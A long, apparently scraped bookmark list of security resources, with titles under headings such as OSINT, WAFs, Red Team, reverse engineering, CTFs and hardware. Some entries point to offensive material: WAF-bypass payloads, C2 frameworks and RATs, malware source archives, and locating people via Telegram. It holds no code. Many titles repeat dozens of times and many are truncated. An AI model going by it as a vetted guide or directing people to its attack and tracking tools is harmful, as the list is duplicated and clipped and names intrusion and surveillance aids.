• TWINT
• snscrape
• dmi-tcat - Twitter Capture and Analysis Toolset.
• KnockKnock
• recox
• openSquat
• Trace Labs Kali Linux build configuration - labs-osint-vm/).
• natlas
• Kitsune
• OSINT-Brazuca
• Maltego Transforms for WhatsMyName
• sherlock
• usufy
• osrf
• Scrummage
• viper
• ⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾
• DetectDee
• h8mail
• PwnBin
• pastego
• galer - in.
• How to bypass CloudFlare bot protection ?
• SpyScrap
• pwnedOrNot
• chatter
• Slackhound
• ail-feeder-telegram
• MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
• Telegram messenger CLI - cli` for Telegram IM.
• TelegramScraper - /disinformation and investigating shade goings on.
• OSINT-Discord-resources
• IntelMQ - suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
• Identifying A Pro-Indonesian Propaganda Bot Network
• IntelMQ - suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
• Stealth plane in flight
• ODBParser
• The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.

Vulnerability

• Beating the OWASP Benchmark
• Decentralized Application Security Project
• Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Meteor Blind NoSQL Injection
• New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service
• Open-Source Vulnerability Intelligence Center - Vulnerability Intelligence Center / Exploits
• How to Have a Cybersecurity Graph Database on Your PC
• On the Security Vulnerabilities of Text-to-SQL Models
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners - scanner-exploiting-pocs)
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Security Bulletins that relate to Netflix Open Source
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Beating the OWASP Benchmark
• Striker
• SQL Vulnerability Scanner
• Beating the OWASP Benchmark
• CMSScan
• tsunami-security-scanner
• openVulnQuery - based client for the Cisco openVuln API
• HellRaiser
• Vagrant GVM/Openvas
• How to Have a Cybersecurity Graph Database on Your PC
• On the Security Vulnerabilities of Text-to-SQL Models

WAFs

• Web Application Penetration Testing Course URLs
• WAF through the eyes of hackers
• Some nice payloads to bypass XSS WAF
• Web Application Penetration Testing Notes
• bypassing moderning web application firewalls
• Some MySQL tricks to break some #WAFs out there.
• another one
• Bypassing Cloudflare WAF with the origin server IP address
• Wordpress technique
• A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection
• quarantyne
• Sitadel
• WAFW00F
• WAF-Hook
• Shadowcrypt Cloudflare resolve
• Behindflare tool
• WAF through the eyes of hackers
• Some nice payloads to bypass XSS WAF
• Some MySQL tricks to break some #WAFs out there.
• another one
• Bypassing Cloudflare WAF with the origin server IP address

Red Team

• Flying under the radar
• How Do I Prepare to Join a Red Team?
• Red Team & Physical Entry Gear
• So You Want to Run a Red Team Operation
• Alternative C2 for Red Teamers - JScript RAT
• tunning tip
• A Red Teamer's guide to pivoting
• Choose Your Own Red Team Adventure
• AQUARMOURY
• Prelude Operator
• pivoting cheat sheet
• Self-hosting Your Red Team Payloads - deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
• Red Teaming/Adversary Simulation Toolkit
• Python Backdoor Talking to a C2 Through Ngrok
• Cobalt Strike Beacon Injected into werfault.exe
• In-Memory-Only ELF Execution (Without tmpfs)
• FIN6 Adversary Emulation
• Red Team Tactics: Hiding Windows Services
• THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.
• 面向iOS攻击的beacon生成
• Gaining access on an external engagement through spear-phishing
• Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
• Red Team development and operations
• Cobalt Strike - strike-4-2-everything-but-the-kitchen-sink/)
• Building C2 Implants in C++: A Primer
• Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
• Machine Learning for Red Teams, Part 1
• Red Tip #415 - r domain.fqdn -U username” to change the password so you can use the account.
• Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1
• Prelude Operator
• The-Hacker-Playbook-3-Translation
• ToRat
• Awesome Red Teaming
• DumpsterFire - driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
• demiguise
• Sn1per
• jenkins-shell
• Red Team's SIEM
• Red Team & Physical Entry Gear
• Phantom Tap (PhanTap)
• caldera
• BankSecurity - Red_Team
• Red-Teaming-Toolkit
• RedFile
• Choose Your Own Red Team Adventure
• 0xsp Mongoose Red for Windows
• Macrome
• FireEye Red Team Tool Countermeasures
• wifipumpkin3
• redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness
• Boomerang
• Mythic - platform, red teaming framework.
• Alan Framework - exploitation framework.
• Wiki to collect Red Team infrastructure hardening resources
• VECTR
• Mortar Loader
• RedTeam-Tools
• CrossC2 - platform payload
• Cobalt-Strike-CheatSheet
• Introducing - strike.github.io/community_kit/)
• melting-cobalt
• Octopus - operation C2 server based on python and powershell
• Covenant
• tc2
• Silver
• PoshC2 - exploitation and lateral movement. [Native macOS Implants](https://labs.nettitude.com/blog/poshc2-introducing-native-macos-implants/)
• link

Purple Team

• PRO TIP when looking through logs on Windows. Use WEVTUTIL.exe
• Purple Cloud - realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On [kiploit](https://www.kitploit.com/2020/09/purplecloud-infrastructure-as-code-iac.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+%28PenTest+Tools%29)

Malware Articles and Sources

• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• Fundamentos de Engenharia Reversa
• Dangers of the Decompiler
• RE guide for beginners: Methodology and tools
• Reversing ARM Binaries
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• Reversing a Japanese Wireless SD Card From Zero to Code Execution
• Reverse engineering Go binaries using Radare 2 and Python
• IDAPro Cheat Sheet
• IDA Python
• TLS callbacks
• rename gamemaker handlers
• Controlling GDB
• Low Level Visualization via Debuggers
• Faster GDB Startup
• Getting Started with Frida Tools
• Immunity Debugger
• mona
• DEBIN
• Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
• Manticore
• Beam me up, CFG. - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
• Generic Anomalies - executable file
• Linux Reverse Engineering CTFs for Beginners
• Reverse Engineering of a Not-so-Secure IoT Device
• Python for Reverse Engineering 1
• The 101 of ELF files on Linux - Linux Audit
• On ELF, Part 1
• On ELF, Part 2
• Kaitai Struct
• Reverse Engineering 'A Link to the Past (GBA)' ep 1
• wiggle
• Reverse-engineering precision op amps from a 1969 analog computer
• Qiling Framework
• Tales Of Binary Deobfuscation - Part 1
• Reverse Engineering a Linux executable – hello world
• Deobfuscation - protected program
• VX Underground
• Como automaticamente atachar um processo a um debugger.
• Taming Virtual Machine Based Code Protection
• playing with little endian
• #BazarBackdoor Group #CobaltStrike Payload
• The Debugging Book
• Debugging System with DCI and Windbg - to-SMM LPE exploit & demo](https://twitter.com/standa_t/status/1376525000002334725), [SmmExploit](https://github.com/tandasat/SmmExploit).
• SCAS/SCASB/SCASW/SCASD
• Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
• Reverse engineering (Absolute) UEFI modules for beginners
• Reverse Engineering the M6 Smart Fitness Bracelet
• OpenSecurityTraining2 - 1180701) is a 501c3 non-profit working to create the world's best cybersecurity training.
• Nightmare
• Deobfuscating DanaBot’s API Hashing
• Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how
• Reverse Engineering PsExec for fun and knowledge
• Reverse Engineering TikTok's VM Obfuscation
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• part 1 - hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
• IDA Python
• CPU Adventure – Unknown CPU Reversing - engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
• IDA Python
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• IDA Python
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• IDA Python
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• Practical-Reverse-Engineering-using-Radare2
• IDA Python
• some things about gef
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• part 1 - hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• IDA Python
• rattle
• Reverse Engineer's Toolkit
• REDasm
• Programmer De-anonymization from Binary Executables
• Reverse engineering WhatsApp Web
• BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
• Reverse Engineering for Beginners
• VivienneVMM - x hypervisor.
• Xori
• starshipraider
• GBA-IDA-Pseudo-Terminal
• binja-ipython
• PySameSame
• r2pipe for V
• radare2-webui
• idaemu - use for emulating code in IDA Pro.
• lighthouse
• Lumen
• EFISwissKnife
• IDA Python
• Tenet - trace-explorer/).
• pwndbg
• PEDA
• GDB Tutorial for Reverse Engineers
• Getting Started with Frida Tools
• part 1 - hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
• fridump3
• r2flutch
• WinDbg-Samples
• windbglib
• PBA - Analysis Tools
• functrace
• Signature-Base - base is the signature database for my scanners LOKI and SPARK Core.
• Virtuailor
• execution-trace-viewer
• binsider
• findLoop
• uncompyle6 - version [Python bytecode decompiler](https://www.kitploit.com/2019/07/uncompyle6-cross-version-python.html)
• Decompyle++
• bearparser - bear](https://github.com/hasherezade/pe-bear-releases)
• pev - featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries.
• Sourcetrail - source cross-platform source explorer.
• batch_deobfuscator
• Tales Of Binary Deobfuscation - Part 1
• evilquest_deobfuscator
• XLMMacroDeobfuscator
• syntia
• Stadeo - flow-flattening and string deobfuscator
• Semi-Automatic Code Deobfuscation
• msynth - Arithmetic (MBA) expressions.
• Glasgow Debug Tool
• MalwareSourceCode
• VXUG-Papers - underground.org/papers.html) from members of vx-underground.
• HyperDbg Debugger
• The HT Editor
• ImHex
• Finding memory bugs with AddressSanitizer
• flare-floss - Automatically extract obfuscated strings from malware.
• dexcalibur - in-one Android reverse engineering platform.
• rr
• panda - Neutral Dynamic Analysis.
• qira
• qemu_blog
• miasm
• rehex
• Bless
• rizin - like reverse engineering framework and command-line toolset. [site](https://rizin.re/)
• reFlutter
• capa - source tool to identify capabilities in executable files.
• aDLL - Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time.
• pyc2bytecode - code(.pyc) files across all python versions (including Python 3.10.*)
• Acronis True Image Costs Performance When Not Used
• Fundamentos de Engenharia Reversa
• Reverse engineering Go binaries using Radare 2 and Python
• TLS callbacks
• Controlling GDB
• Low Level Visualization via Debuggers
• Manticore
• Python for Reverse Engineering 1
• Tales Of Binary Deobfuscation - Part 1
• Como automaticamente atachar um processo a um debugger.
• Finding memory bugs with AddressSanitizer
• #BazarBackdoor Group #CobaltStrike Payload
• Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how

Decompilers

• decompile_java - another java decompiler.
• NoVmp
• Awesome IDA, x64DBG & OllyDBG plugins
• edb - platform AArch32/x86/x86-64 debugger.
• Interactive Delphi Reconstructor IDR
• PyInstaller Extractor

Yara

• mkYARA - it/mkyara))
• xored_pefile_mini
• ThreatHunting
• Yara-Rules
• Repository containing Indicators of Compromise and Yara rules
• YARA in a nutshell
• yara
• Yara-Rules
• ReversingLabs YARA Rules
• YaraHunts
• YARA Rules for ProcFilter
• yara-validator
• Vim Syntax Highlighting for YARA Rules - highlighting file for YARA rules covering YARA 4.0

Ghidra

• ghidra
• Decompiler Analysis Engine - flow analysis on software, starting from the binary executable.
• Working With Ghidra's P-Code To Identify Vulnerable Function Calls
• GhIDA - Talos/GhIDA).
• SVD-Loader for Ghidra - metal ARM reverse engineering. [repo](https://github.com/leveldown-security/SVD-Loader-Ghidra)
• Introduction to Reverse Engineering with Ghidra: A Four Session Course
• Ghidra Plugin Development for Vulnerability Research - Part-1
• Defeating Code Obfuscation with Angr
• ghidra2frida
• Reversing Raw Binary Firmware Files in Ghidra
• IDA Graph view with outlined function included
• G-3PO: A Protocol Droid for Ghidra
• Reverse Engineering Go Binaries with Ghidra
• ghidra-firmware-utils
• dragondance
• Ghidraaas
• GhidraX64Dbg
• AngryGhidra
• Ghidrathon - source extension to add [Python 3 scripting to Ghidra](https://www.mandiant.com/resources/blog/ghidrathon-snaking-ghidra-python-3-scripting).
• ghidra
• Reverse Engineering Go Binaries with Ghidra
• ghidra-scripts

Tokens

• part 1
• part 2
• part 3
• Executable-Space Protection and ASLR
• Gitian - control oriented software distribution method.
• Canarytokens - quick-free-detection.html) [canaryfy](https://github.com/thinkst/canaryfy)
• CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
• How to Know if Someone Access your Files with Canary Tokens
• Web App Security 101
• part 3
• Ristretto - malleable encodings.
• SEI CERT C Coding Standard
• MSC24-C. Do not use deprecated or obsolescent functions
• US-CERT: memcpy_s() and memmove_s()
• Field Experience With Annex K — Bounds Checking Interfaces
• Librando - in-time compilers
• Checked C
• Practical case: Buffer Overflow 0x01
• A Git Horror Story
• An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
• Tooling for verification of PGP signed commits
• How C array sizes become part of the binary interface of a library
• When the going gets tough
• GTER 47 | GTS 33 - Dia 2 (parte 1)
• SAFECode - profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods.
• Security Code Review 101
• Elliptic Curve Cryptography Explained
• How to Process Passwords as a Software Developer
• Sendy is Insecure
• Cheating in Elliptic Curve Billiards 2
• DevSecOps
• Most Popular Analysis Tools by Programming Language
• A Graduate Course in Applied Cryptography
• Comments on build reproducibility
• Integrating Security in the Development Pipeline
• DazedAndConfused
• Awesome AppSec
• HTTP Security Headers - A Complete Guide
• What science can tell us about C and C++'s security
• HACL*
• QL
• shhgit
• You don’t need reproducible builds.
• huskyCI
• How C array sizes become part of the binary interface of a library
• Checklist of the most important security countermeasures when designing, testing, and releasing your API
• sanitizers
• Canary
• CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
• Wycheproof
• heaphopper - implementations
• Safe C Library
• TSLint
• pigaios
• tlse
• tinyalloc
• Sandboxed API
• Villoc
• MazuCC
• GitGuardian Documentation and Resources - gitguardian)
• Vuln Cost - Security Scanner for VS Code
• KaiMonkey
• SLSA - chain Levels for Software Artifacts, Proposal
• Security Scorecards - documentation)
• kcare-uchecker
• Package Hunter
• rubocop
• Executable-Space Protection and ASLR
• Gitian - control oriented software distribution method.
• Field Experience With Annex K — Bounds Checking Interfaces
• Librando - in-time compilers
• A Git Horror Story

SAST

• How disable comments make static analysis tools worse
• A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
• Potential remote code execution in PyPI
• Pip-audit - backed tool probes Python environments for vulnerable packages.
• Horusec
• Scan - source security audit tool for modern DevOps teams. [sast-scan](https://github.com/ShiftLeftSecurity/sast-scan): A Free & Open Source DevSecOps Platform.
• What's New with SAST + DAST
• DevSecOps with DAST and Security Hub
• Source Code Analysis Tools
• Trojan Source - source)
• Coccinelle
• SAST Analyzers
• COVERITY SCAN
• Warn users when a PR contains some characters - directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired.
• A Guide On Implementing An Effective SAST Workflow
• Static analysis powered security scanner for your terraform code
• brakeman
• Sonarqube Community Branch Plugin
• trivy
• ikos
• Potential remote code execution in PyPI
• SAST Analyzers

Secure Web dev

• Introduction to OWASP Top 10 2021
• Projects/OWASP Node js Goat Project
• OWASP Top 10 Proactive Controls 2018
• Password Storage Cheat Sheet
• Introduction - OWASP Cheat Sheet Series
• CWE Top 25 Most Dangerous Software Weaknesses
• GitLab analysis of OWASP Top 10 changes from 2004 to 2021
• Prototype Pollution in Python
• OWASP Cornucopia
• WebSecurity Academy
• WebSploit Labs
• Stop Password Masking
• Forgot password? Taking over user accounts Kaminsky style
• Exploiting OWASP Top 10 API Vulnerabilities
• Database Security Cheat Sheet
• The 2021 CWE Most Important Hardware Weaknesses
• Secure Modular Runtimes
• Datashare Server Mode
• CheatSheetSeries
• Prototype pollution – and bypassing client-side HTML sanitizers
• Understanding the CSRF Vulnerability (A Beginner’s Guide)
• OWASP-Testing-Checklist
• OWASP Web Security Testing Guide - project-web-security-testing-guide/)
• OWASP-Web-Checklist
• DependencyCheck - check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies.
• OWASP Risk Assessment Calculator - Calculator)
• OWASP Top 10 Proactive Controls 2018
• vAPI - Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises.
• secDevLabs
• VulnyCode
• PwnMachine
• oxAuth
• Forgot password? Taking over user accounts Kaminsky style

Formal Analysis

• SCYTHE's Community Threats Repository
• A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs - Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)
• A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs - Usenix2020.pdf)/[video](https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/sec20/videos/0812/s1_wireless_security/1_sec20winter-paper653-presentation-video-final.mp4)

Fuzzing

• Generating Software Tests - se/fuzzingbook/))
• RESTler finds security and reliability bugs through automated fuzzing - fuzzer): is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. [REST API Fuzz Testing (RAFT)](https://github.com/microsoft/rest-api-fuzz-testing): Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows.
• Dynamic Program Analysis
• Fuzzing the Linux Kernel
• Fuzzing Workshops
• Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
• afl-unicorn
• Start-Hollow.ps1
• Structure-Aware Fuzzing with libFuzzer - test-suite)
• Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
• Introduction to VirtualBox security research
• BrokenType
• The Challenges of Fuzzing 5G Protocols
• Regaxor
• Dizzy-legacy
• auditd-attack
• BFuzz
• Fuzzilli
• Materials from Fuzzing Bay Area meetups
• javafuzz - guided fuzzer for testing Java packages.
• onefuzz - hosted Fuzzing-As-A-Service platform.
• ffuf
• rFuss2
• Jackalope - guided fuzzer for Windows and macOS
• AFLplusplus - free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
• s a n d s i f t e r
• Fuzzing-101
• AFLNet
• ClusterFuzz
• Fuzzing Workshops

API

• REST API Checklist
• Part 2 of 3
• How to contact Google SRE: Dropping a shell in cloud SQL
• Here you can find a variaty of resources to help you out on the API security path.
• The Web API Checklist
• Your Comprehensive Web API Design Checklist
• API Security Testing
• Free API and Microservice Books
• REST API Testing Tutorial
• REST Security Cheat Sheet
• Penetration Testing RESTful Web Services
• RESTful web services penetation testing
• Astra
• Introducing vAPI – an open source lab environment to learn about API security
• Part 2 of 3
• Part 3 of 3
• OWASP API Security Project
• Istio
• hack-requests - requests is an http network library for hackers
• MindAPI
• bad_json_parsers

Web Training

• dvna
• VulnLab

API

• Penetration testing laboratories "Test lab"
• Deploying CTFd
• The fast, easy, and affordable way to train your hacking skills.
• Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle
• Alice sent Bob a meme - UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm.
• RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
• Closing Capture the Flag Session & Winning Team Presentation
• Capture the Flag
• CTF KAVACON 21 – LUZ ROJA, LUZ VERDE
• Pwn2Win 2018 - pt1.txt)
• Leap Security
• Mumbai:1 Vulnhub Walkthrough
• 0x0G 2020 CTF
• r2dec
• SASatHome
• Bash injection without letters or numbers - 33c3ctf hohoho
• Writeup CTF - Web API Exploitation
• eDump
• RET2 WarGames
• Penetration testing laboratories "Test lab"
• CTFd Tips
• DEF CON CTF 2021 QUALS - ctf-2021-finals/), [files](https://github.com/o-o-overflow)
• HackLab #1
• CTF: Aprende «hacking» jugando
• FIRST SecLounge CTF 2020 Solutions
• FIRST SecLounge CTF 2020 Solutions
• Hitcon2017CTF - 家徒四壁~Everlasting Imaginative Void~
• SASatHome
• Bash injection without letters or numbers - 33c3ctf hohoho
• Writeup CTF - Web API Exploitation
• Mellivora
• Boss of the SOC (BOTS) Dataset Version 3
• SA-ctf_scoreboard
• Write-ups for crackmes and CTF challenges
• pwntools
• google-ctf
• 35c3ctf-challs
• ctf-tasks - level CTF challenges developed over the years.
• $50 million CTF Writeup
• RsaCtfTool - retreive private key from weak public key and/or uncipher data
• BalsnCTF-2019
• HackTheBox CTF Cheatsheet
• Crypton
• attack & defense CTF demo
• ctftool
• CTF-Writeups
• HITB SECCCONF EDU CTF 2021
• CTF: Aprende «hacking» jugando
• HackLab #1

CTFs tools

• Real World CTF 2023
• thg-framework
• CTFs-Exploits
• nc-chat-ctf
• thg-framework
• Super-Guesser-ctf
• Ciphr - army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
• sec-tools

CTFs tools

• Deep Dive
• Hacker Finds Hidden 'God Mode' on Old x86 CPUs - > [rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge): Hardware backdoors in some x86 CPUs
• USBHarpoon
• Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
• Dragonblood
• Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
• Extracting seed from Ellipal wallet
• Deep Dive
• Patching Binaries with Radare2 - ARM64
• Lexra - bit variant of the MIPS architecture.
• Something about IR optimization
• Breaking Trezor One with Side Channel Attacks
• Rewriting Functions in Compiled Binaries
• LAB ENVIRONMENT
• A 2018 practical guide to hacking RFID/NFC
• Saleae
• Osiris
• One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization
• Statically compiled ARM binaries for debugging and runtime analysis.
• IDA-scripts
• A 2018 practical guide to hacking RFID/NFC
• IDA-scripts
• The Hacker's Hardware Toolkit
• HUB
• arm vm working out of the box for everyone
• riscv-ida - V ISA processor module for IDAPro 7.x
• mac-age
• IntelTEX-PoC
• me_cleaner
• wacker
• Unfixable Seed Extraction on Trezor - A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$.
• Extracting seed from Ellipal wallet
• Breaking Trezor One with Side Channel Attacks
• Saleae

Hardware

• Guarding Against Physical Attacks: The Xbox One Story
• Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
• The Practical Guide to Hacking Bluetooth Low Energy
• Hacker's guide to deep-learning side-channel attacks: the theory
• BrakTooth
• A Practical Guide to BLE Throughput
• SkyJack
• Hacking Printers Wiki
• The x86 architecture is the weirdo, part 2
• Full key extraction of NVIDIA™ TSEC
• USB Attacks: Past, Present and Future - VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
• PLATYPUS - based power side-channel attacks on Intel server, desktop and laptop CPUs.
• VoltPillager - based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
• ToorCon 14 Badge
• Evil Logitech - erm I ment USB cable. [USB Samurai](https://infosecwriteups.com/usbsamurai-a-remotely-controlled-malicious-usb-hid-injecting-cable-for-less-than-10-ebf4b81e1d0b?gi=ade3f719f778) [For Dummies](https://infosecwriteups.com/usbsamurai-for-dummies-4bd47abf8f87)
• Common BMC vulnerabilities and how to avoid repeating them - 18/Wed-August-8/us-18-Waisman-Soler-The-Unbearable-Lightness-of-BMC.pdf) [Perilous Peripherals: The Hidden Dangers Inside Windows & Linux Computers](https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/)
• Exploiting IoT enabled BLE smart bulb security
• Cracking WiFi at Scale with One Simple Trick
• Car hijacking swapping a single bit
• Hacking a VW Golf Power Steering ECU - Part 1, [Part 2](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part2/) [Part 3](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part3/) and [Part 4](https://blog.willemmelching.nl/carhacking/2022/01/02/vw-part4/). [VW PQ35 EPS flasher](https://github.com/pd0wm/pq-flasher)
• Reverse Engineering Yaesu FT-70D Firmware Encryption
• Reverse-engineering an airspeed/Mach indicator from 1977
